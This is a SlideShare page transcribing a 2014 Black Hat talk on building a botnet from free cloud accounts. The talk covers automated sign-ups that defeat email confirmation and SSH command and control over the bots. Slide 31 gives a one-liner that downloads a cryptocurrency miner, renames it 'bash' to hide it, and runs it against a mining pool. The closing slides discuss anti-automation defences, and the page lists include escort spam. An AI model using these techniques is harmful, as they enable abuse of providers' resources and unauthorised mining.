Meetup milano #3 all you need to know before creating your vpcMeetup milano #3 all you need to know before creating your vpc
Meetup milano #3 all you need to know before creating your vpcGonzalo Marcos Ansoain
 
Boundless Digital - Boost IT Network Capabilities thanks to Cisco APIs
Boundless Digital - Boost IT Network Capabilities thanks to Cisco APIsBoundless Digital - Boost IT Network Capabilities thanks to Cisco APIs
Boundless Digital - Boost IT Network Capabilities thanks to Cisco APIsSidney Burks, Ph.D
 
[Call for code] IBM 블록체인을 활용하여 투명하게 구호기금 관리하기 - Hyperledger Fabric v1.1 by 맹개발
[Call for code] IBM 블록체인을 활용하여 투명하게 구호기금 관리하기 - Hyperledger Fabric v1.1 by 맹개발 [Call for code] IBM 블록체인을 활용하여 투명하게 구호기금 관리하기 - Hyperledger Fabric v1.1 by 맹개발
[Call for code] IBM 블록체인을 활용하여 투명하게 구호기금 관리하기 - Hyperledger Fabric v1.1 by 맹개발 Yunho Maeng
 
Achieving scalability & speed with IaaS
Achieving scalability & speed with IaaSAchieving scalability & speed with IaaS
Achieving scalability & speed with IaaSIBM Software India
 
Getting started with bc 2.0 in the cloud
Getting started with bc 2.0 in the cloud Getting started with bc 2.0 in the cloud
Getting started with bc 2.0 in the cloudLennartF
 
How to build corporate size fraud prevention
How to build corporate size fraud preventionHow to build corporate size fraud prevention
How to build corporate size fraud preventionYury Leonychev
 
IoT with the Best: Watson IoT Bluemix and Blockchain
IoT with the Best: Watson IoT Bluemix and BlockchainIoT with the Best: Watson IoT Bluemix and Blockchain
IoT with the Best: Watson IoT Bluemix and BlockchainValerie Lampkin
 
IBM's Watson IoT Platform Allows You to Quickly Connect Devices to Bluemix Cl...
IBM's Watson IoT Platform Allows You to Quickly Connect Devices to Bluemix Cl...IBM's Watson IoT Platform Allows You to Quickly Connect Devices to Bluemix Cl...
IBM's Watson IoT Platform Allows You to Quickly Connect Devices to Bluemix Cl...WithTheBest
 
From Zero to Serverless
From Zero to ServerlessFrom Zero to Serverless
From Zero to ServerlessChad Green
 
IBM API Connect Deployment `Good Practices - IBM Think 2018
IBM API Connect Deployment `Good Practices - IBM Think 2018IBM API Connect Deployment `Good Practices - IBM Think 2018
IBM API Connect Deployment `Good Practices - IBM Think 2018Chris Phillips
 
Will Microservices Die.pdf
Will Microservices Die.pdfWill Microservices Die.pdf
Will Microservices Die.pdfRichHagarty
 
Hyperledger Fabric - Blockchain for the Enterprise - FOSDEM 20190203
Hyperledger Fabric - Blockchain for the Enterprise - FOSDEM 20190203Hyperledger Fabric - Blockchain for the Enterprise - FOSDEM 20190203
Hyperledger Fabric - Blockchain for the Enterprise - FOSDEM 20190203Arnaud Le Hors
 
Cloud Computing v.s. Cyber Security
Cloud Computing v.s. Cyber Security Cloud Computing v.s. Cyber Security
Cloud Computing v.s. Cyber Security Bahtiyar Bircan
 
Using IBM Blockchain Platform (November 2019)
Using IBM Blockchain Platform (November 2019)Using IBM Blockchain Platform (November 2019)
Using IBM Blockchain Platform (November 2019)Matt Lucas
 
Blockchain for Business
Blockchain for BusinessBlockchain for Business
Blockchain for BusinessAhmad Gohar
 
Blockchain with HyperLedger (Public version)
Blockchain with HyperLedger (Public version)Blockchain with HyperLedger (Public version)
Blockchain with HyperLedger (Public version)Benjamin Fuentes
 

Similar to CloudBots - Harvesting Crypto Currency Like a Botnet Farmer (20)

Black Hat USA - CloudBots Harvesting Crypto Coins Like a Botnet Farmer
Black Hat USA - CloudBots Harvesting Crypto Coins Like a Botnet FarmerBlack Hat USA - CloudBots Harvesting Crypto Coins Like a Botnet Farmer
Black Hat USA - CloudBots Harvesting Crypto Coins Like a Botnet Farmer
 
How to build corporate size fraud prevention
How to build corporate size fraud preventionHow to build corporate size fraud prevention
How to build corporate size fraud prevention
 
VPCs, Metrics Framework, Back pressure : MuleSoft Virtual Muleys Meetups
VPCs, Metrics Framework, Back pressure : MuleSoft Virtual Muleys MeetupsVPCs, Metrics Framework, Back pressure : MuleSoft Virtual Muleys Meetups
VPCs, Metrics Framework, Back pressure : MuleSoft Virtual Muleys Meetups
 
Beyond S3 Buckets - Effective Countermeasures for Emerging Cloud Threats
Beyond S3 Buckets - Effective Countermeasures for Emerging Cloud ThreatsBeyond S3 Buckets - Effective Countermeasures for Emerging Cloud Threats
Beyond S3 Buckets - Effective Countermeasures for Emerging Cloud Threats
 
Meetup milano #3 all you need to know before creating your vpc
Meetup milano #3 all you need to know before creating your vpcMeetup milano #3 all you need to know before creating your vpc
Meetup milano #3 all you need to know before creating your vpc
 
Boundless Digital - Boost IT Network Capabilities thanks to Cisco APIs
Boundless Digital - Boost IT Network Capabilities thanks to Cisco APIsBoundless Digital - Boost IT Network Capabilities thanks to Cisco APIs
Boundless Digital - Boost IT Network Capabilities thanks to Cisco APIs
 
[Call for code] IBM 블록체인을 활용하여 투명하게 구호기금 관리하기 - Hyperledger Fabric v1.1 by 맹개발
[Call for code] IBM 블록체인을 활용하여 투명하게 구호기금 관리하기 - Hyperledger Fabric v1.1 by 맹개발 [Call for code] IBM 블록체인을 활용하여 투명하게 구호기금 관리하기 - Hyperledger Fabric v1.1 by 맹개발
[Call for code] IBM 블록체인을 활용하여 투명하게 구호기금 관리하기 - Hyperledger Fabric v1.1 by 맹개발
 
Achieving scalability & speed with IaaS
Achieving scalability & speed with IaaSAchieving scalability & speed with IaaS
Achieving scalability & speed with IaaS
 
Getting started with bc 2.0 in the cloud
Getting started with bc 2.0 in the cloud Getting started with bc 2.0 in the cloud
Getting started with bc 2.0 in the cloud
 
How to build corporate size fraud prevention
How to build corporate size fraud preventionHow to build corporate size fraud prevention
How to build corporate size fraud prevention
 
IoT with the Best: Watson IoT Bluemix and Blockchain
IoT with the Best: Watson IoT Bluemix and BlockchainIoT with the Best: Watson IoT Bluemix and Blockchain
IoT with the Best: Watson IoT Bluemix and Blockchain
 
IBM's Watson IoT Platform Allows You to Quickly Connect Devices to Bluemix Cl...
IBM's Watson IoT Platform Allows You to Quickly Connect Devices to Bluemix Cl...IBM's Watson IoT Platform Allows You to Quickly Connect Devices to Bluemix Cl...
IBM's Watson IoT Platform Allows You to Quickly Connect Devices to Bluemix Cl...
 
From Zero to Serverless
From Zero to ServerlessFrom Zero to Serverless
From Zero to Serverless
 
IBM API Connect Deployment `Good Practices - IBM Think 2018
IBM API Connect Deployment `Good Practices - IBM Think 2018IBM API Connect Deployment `Good Practices - IBM Think 2018
IBM API Connect Deployment `Good Practices - IBM Think 2018
 
Will Microservices Die.pdf
Will Microservices Die.pdfWill Microservices Die.pdf
Will Microservices Die.pdf
 
Hyperledger Fabric - Blockchain for the Enterprise - FOSDEM 20190203
Hyperledger Fabric - Blockchain for the Enterprise - FOSDEM 20190203Hyperledger Fabric - Blockchain for the Enterprise - FOSDEM 20190203
Hyperledger Fabric - Blockchain for the Enterprise - FOSDEM 20190203
 
Cloud Computing v.s. Cyber Security
Cloud Computing v.s. Cyber Security Cloud Computing v.s. Cyber Security
Cloud Computing v.s. Cyber Security
 
Using IBM Blockchain Platform (November 2019)
Using IBM Blockchain Platform (November 2019)Using IBM Blockchain Platform (November 2019)
Using IBM Blockchain Platform (November 2019)
 
Blockchain for Business
Blockchain for BusinessBlockchain for Business
Blockchain for Business
 
Blockchain with HyperLedger (Public version)
Blockchain with HyperLedger (Public version)Blockchain with HyperLedger (Public version)
Blockchain with HyperLedger (Public version)
 

More from Rob Ragan

Nbt hacker fight
Nbt hacker fightNbt hacker fight
Nbt hacker fightRob Ragan
 
Expose Yourself Without Insecurity: Cloud Breach Patterns
Expose Yourself Without Insecurity: Cloud Breach PatternsExpose Yourself Without Insecurity: Cloud Breach Patterns
Expose Yourself Without Insecurity: Cloud Breach PatternsRob Ragan
 
DeadDropSF - Better Red Than Dead
DeadDropSF - Better Red Than DeadDeadDropSF - Better Red Than Dead
DeadDropSF - Better Red Than DeadRob Ragan
 
Interop 2017 - Defeating Social Engineering, BEC, and Phishing
Interop 2017 - Defeating Social Engineering, BEC, and PhishingInterop 2017 - Defeating Social Engineering, BEC, and Phishing
Interop 2017 - Defeating Social Engineering, BEC, and PhishingRob Ragan
 
Lord of the Bing - Black Hat USA 2010
Lord of the Bing - Black Hat USA 2010Lord of the Bing - Black Hat USA 2010
Lord of the Bing - Black Hat USA 2010Rob Ragan
 
Filter Evasion: Houdini on the Wire
Filter Evasion: Houdini on the WireFilter Evasion: Houdini on the Wire
Filter Evasion: Houdini on the WireRob Ragan
 
Static Analysis: The Art of Fighting without Fighting
Static Analysis: The Art of Fighting without FightingStatic Analysis: The Art of Fighting without Fighting
Static Analysis: The Art of Fighting without FightingRob Ragan
 

More from Rob Ragan (7)

Nbt hacker fight
Nbt hacker fightNbt hacker fight
Nbt hacker fight
 
Expose Yourself Without Insecurity: Cloud Breach Patterns
Expose Yourself Without Insecurity: Cloud Breach PatternsExpose Yourself Without Insecurity: Cloud Breach Patterns
Expose Yourself Without Insecurity: Cloud Breach Patterns
 
DeadDropSF - Better Red Than Dead
DeadDropSF - Better Red Than DeadDeadDropSF - Better Red Than Dead
DeadDropSF - Better Red Than Dead
 
Interop 2017 - Defeating Social Engineering, BEC, and Phishing
Interop 2017 - Defeating Social Engineering, BEC, and PhishingInterop 2017 - Defeating Social Engineering, BEC, and Phishing
Interop 2017 - Defeating Social Engineering, BEC, and Phishing
 
Lord of the Bing - Black Hat USA 2010
Lord of the Bing - Black Hat USA 2010Lord of the Bing - Black Hat USA 2010
Lord of the Bing - Black Hat USA 2010
 
Filter Evasion: Houdini on the Wire
Filter Evasion: Houdini on the WireFilter Evasion: Houdini on the Wire
Filter Evasion: Houdini on the Wire
 
Static Analysis: The Art of Fighting without Fighting
Static Analysis: The Art of Fighting without FightingStatic Analysis: The Art of Fighting without Fighting
Static Analysis: The Art of Fighting without Fighting
 

Recently uploaded

The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...gurkirankumar98700
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024The Digital Insurer
 
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsTop 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsRoshan Dwivedi
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 

Recently uploaded (20)

The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsTop 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 

CloudBots - Harvesting Crypto Currency Like a Botnet Farmer

  • 1. CloudBots: Harvesting Crypto Coins Like a Botnet Farmer 2014 August 6
  • 2. 2 …and Violating Terms of Service Building a Botnet with Free Cloud-based Services
  • 3. 3 Main Topics •  Could we build a botnet from freely available cloud services? •  Will we see the rise of more cloud based botnets? •  Should insufficient anti-automation be considered a top ten vulnerability? What are these guys talking about? Overview
  • 4. 4 Platform as a Service Cloud PaaS
  • 5. 5 Platform as a Service Free Cloud Services <Insert  with  other  providers  later>   Reference: http://goo.gl/AZ4nYp
  • 6. 6 Development Environment as a Service Free Cloud Services
  • 8. 8 Automating Registration •  Hurdles -  Email address confirmation -  CAPTCHA -  Phone/SMS -  Credit Card Usability vs Security Cloud Providers (In)Security
  • 9. 9 Anti-Automation Fraudulent Account Registration More Anti-Automation Email Confirmation Only 66% 33% EMAIL CAPTCHA CREDIT CARD PHONE
  • 10. 10 Anti-Automation Techniques •  Email address confirmation •  CAPTCHA •  Phone/SMS •  Credit Card Usability vs Security Cloud Providers (In)Security
  • 11. 11
  • 12. 12 Automated email processing -  Wildcard localpart *@domain.com -  Extract important information from incoming emails -  Grep for confirmation token links and request them Account registration -  Automatic request sent to account activation links SMTP Services Email Confirmation Token Processing
  • 14. 14 Using the Google AppEngine InboundMailHandler - first.last.001@cloudbotmail.appspotmail.com - first.last.002@cloudbotmail.appspotmail.com - first.last.003@cloudbotmail.appspotmail.com - first.last.004@cloudbotmail.appspotmail.com - first.last.005@cloudbotmail.appspotmail.com - first.last.006@cloudbotmail.appspotmail.com - first.last.007@cloudbotmail.appspotmail.com - first.last.008@cloudbotmail.appspotmail.com - first.last.009@cloudbotmail.appspotmail.com - first.last.010@cloudbotmail.appspotmail.com Google App Engine Detection issues
  • 15. 15 Unlimited usernames -  Prevent pattern recognition -  Pull from real world examples [local-part from dump]@domain.tld Realistic Randomness Real Email Addresses
  • 16. 16 Unlimited domains -  freedns.afraid.org -  Prevent detection -  Thousands of unique email domains SMTP Services Plethora of Email Addresses
  • 18. 18 What do we need? •  Free email relay -  Free MX registration •  Process wildcards -  *@domain.tld •  Send unlimited messages -  Unrestricted STMP to HTTP POST/ JSON requests Free Signups Receiving Email and Processing
  • 19. 19 Inbound Mail As A Service Free Cloud Services <Insert  with  other  providers  later>   Reference: http://goo.gl/yqoh6U
  • 20. 20 Automated email processing -  Extract important information from incoming emails -  Grep for confirmation token links and request them Account registration -  Automatic request sent to account activation links SMTP Services Email Confirmation Token Processing Reference: http://bishopfox.github.io/anti-anti-automation/
  • 21. 21 <Insert wall of random email addresses> Realistic Randomness Unique Email Addresses Avoid Pattern Recognition
  • 24. 24 MongoDB •  MongoLab •  MongoHQ Keeping track of all accounts Storing Account Information
  • 26. 26 What can we do? •  Distributed Network Scanning •  Distributed Password Cracking •  DDoS •  Click-fraud •  Crypto Currency Mining •  Data Storage Now we have a botnet! Fun! Botnet Activities
  • 29. 29 What are we using? •  Fabric -  Fabric is a Python library and command- line tool for streamlining the use of SSH for application deployment or systems administration tasks. •  fab check_hosts –P –z 20 •  fab run_command Botnet C2 Command & Control
  • 30. 30 Unique Amazon IP Addresses Distributed Command [na1.cloudbox.net:2352]: curl http://icanhazip.com 4.109.182.13 [eu1.cloudbox.net:3127]: curl http://icanhazip.com 126.34.56.254 [na1.cloudbox.net:10660]: curl http://icanhazip.com 58.251.42.128 [na1.cloudbox.net:15627]: curl http://icanhazip.com 74.216.236.72 [na1.cloudbox.net:8000]: curl http://icanhazip.com 28.228.253.19 [na1.cloudbox.net:4028]: curl http://icanhazip.com 64.216.37.252
  • 31. 31 Make money, money •  Deploying miners •  One command for $$$ All your processors are belong to us Litecoin Mining if [ ! -f bash ]; then wget http://sourceforge.net/projects/ cpuminer/files/pooler-cpuminer-2.3.2-linux-x86_64.tar.gz && tar zxfv pooler-cpuminer-2.3.2-linux-x86_64.tar.gz && rm pooler- cpuminer-2.3.2-linux-x86_64.tar.gz && mv minerd bash; fi; screen ./bash –url=stratum+tcp://pool.mine-litecoin.com -- userpass=ninja.47:47; rm bash
  • 32. 32 Load After Crypto Currency Mining Distributed Command ID | Host | Status ---------------------------------------- 0 | na1.cloudbox.net:1678 | 2 users, load average: 37.08, 37.60, 32.51 1 | na1.cloudbox.net:15121| 1 user, load average: 16.35, 15.35, 12.00 2 | na1.cloudbox.net:11631| 1 user, load average: 19.65, 18.46, 14.38 3 | na1.cloudbox.net:4358 | 2 users, load average: 23.10, 22.91, 18.95 4 | na1.cloudbox.net:1212 | 1 user, load average: 19.60, 18.47, 14.41 5 | na1.cloudbox.net:5841 | 1 user, load average: 19.97, 18.61, 14.52 6 | eu1.cloudbox.net:3025 | 1 user, load average: 19.27, 18.37, 14.33 7 | eu1.cloudbox.net:6892 | 2 users, load average: 19.65, 18.46, 14.38 8 | eu1.cloudbox.net:2038 | 1 user, load average: 18.85, 17.43, 13.45 9 | na1.cloudbox.net:5235 | 1 user, load average: 18.55, 17.32, 13.38 10 | na1.cloudbox.net:1122 | 1 user, load average: 26.04, 25.57, 20.02
  • 33. 33 All your processors are belong to us Litecoin Mining
  • 35. DETECTION No one can catch a ninja!
  • 36. 36 Automatic Backups •  Propagate to other similar services -  e.g. MongoLab ß à MongoHQ •  Infrastructure across multiple service providers •  Easily migrated Armadillo Up ™ Disaster Recovery Plan
  • 41. 41 Crypto Coins & DDoS Clouds Under Siege
  • 42. 42 Crypto Coins & DDoS Clouds Under Siege
  • 44. 44 What can we do? •  Logic puzzles •  Sound output •  Credit card validation •  Live operators •  Limited-use account •  Heuristic checks •  Federated identity systems Usability vs Security Protection Reference: http://www.w3.org/TR/2003/WD-turingtest-20031105/#solutions
  • 45. 45 What should we do? •  Analyzing properties of Sybil accounts •  Analyzing the arrival rate and distribution of accounts •  Flag accounts registered with emails from newly registered domain names •  Email verification •  CAPTCHAs •  IP Blacklisting •  Phone/SMS verification •  Automatic pattern recognition At Abuse vs At Registration Protection Reference: https://www.usenix.org/system/files/conference/usenixsecurity13/sec13-paper_thomas.pdf
  • 46. 46 At Abuse vs At Registration Protection Advanced techniques •  Signup flow events -  Detect common activities after signup •  User-agent -  A registration bot may generate a different user-agent for each signup or use uncommon user-agents •  Form submission timing -  A bot that doesn't mimic human behavior by performing certain actions too quickly can be detected Reference: https://www.usenix.org/system/files/conference/usenixsecurity13/sec13-paper_thomas.pdf
  • 47. THANK YOU Oscar Salazar @tracertea Rob Ragan @sweepthatleg CONTACT@BISHOPFOX.COM